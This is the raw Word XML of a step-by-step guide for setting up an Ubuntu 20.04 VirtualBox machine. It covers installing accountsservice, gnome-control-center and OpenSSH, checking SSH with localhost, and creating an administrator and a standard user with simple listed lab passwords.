      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Oracle VM Virtual Box</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000045">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Required installation in Ubuntu</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000046">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">accountsservice gnome-control-center</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000047">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">openssh-client openssh-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000048">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Required user accounts</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000049">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 administrator account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1 standard user account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004B">
      <w:pPr>
        <w:spacing w:before="200" w:line="276" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Default Login Credentials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ubuntu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ubuntu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Download Ubuntu 20.04 desktop image and virtual box.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Configure the network in virtual box’s setting.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="4638224" cy="1572279"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="3"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638224" cy="157227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3"/>
        </w:numPr>
        <w:spacing w:after="200" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log in to the Ubuntu account</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Open the terminal and install the necessary packages</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo apt-get update</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo apt install accountsservice </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo apt install gnome-control-center</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5819775" cy="847725"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4" name="image15.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image15.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId7"/>
                    <a:srcRect b="0" l="0" r="2083" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5819775" cy="8477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b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5815013" cy="762000"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="15"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5815013"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720" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5838825" cy="609600"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="2" name="image2.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image2.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:srcRect b="0" l="0" r="1762" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="58388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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable the authentication dialog in the terminal</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005A">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$ssh localhost</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If faced with a connection refused error, remove SSH by typing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005C">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo apt-get remove openssh-client openssh-server </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Reinstall SSH by typing</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005E">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$sudo apt-get install openssh-client openssh-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005F">
      <w:pPr>
        <w:ind w:left="0" w:firstLine="720"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5848350" cy="676275"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1" name="image7.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image7.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:srcRect b="0" l="0" r="1602" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5848350" cy="676275"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create a standard user in settings &gt; Users</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">Click on the “Unlock” button</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5486400" cy="2782798"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="12" name="image11.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image11.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:srcRect b="7709" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5486400" cy="278279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sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000062">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Click on the “Add User” button</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000063">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5648325" cy="1247775"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="5" name="image9.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image9.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect b="0" l="0" r="1001" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5648325" cy="1247775"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Credentials:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table3"/>
        <w:tblW w:w="86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4335"/>
        <w:tblGridChange w:id="0">
          <w:tblGrid>
            <w:gridCol w:w="4290"/>
            <w:gridCol w:w="4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ind w:left="0" w:firstLine="0"/>
              <w:rPr>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:sz w:val="26"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">user1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6"/>
                <w:szCs w:val="26"/>
                <w:rtl w:val="0"/>
              </w:rPr>
              <w:t xml:space="preserve">userpass</w:t>
            </w:r>
            <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
              <w:rPr>
                <w:rtl w:val="0"/>
              </w:rPr>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000069">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="0"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3767138" cy="4157427"/>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67138" cy="4157427"/>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3"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="200" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Log out and ensure there are only 2 users</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="3125109" cy="1967661"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="9"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125109" cy="196766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1"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_npmo394vb4mw" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>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rPr>
          <w:b w:val="1"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_rc3iky2mpgwn" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
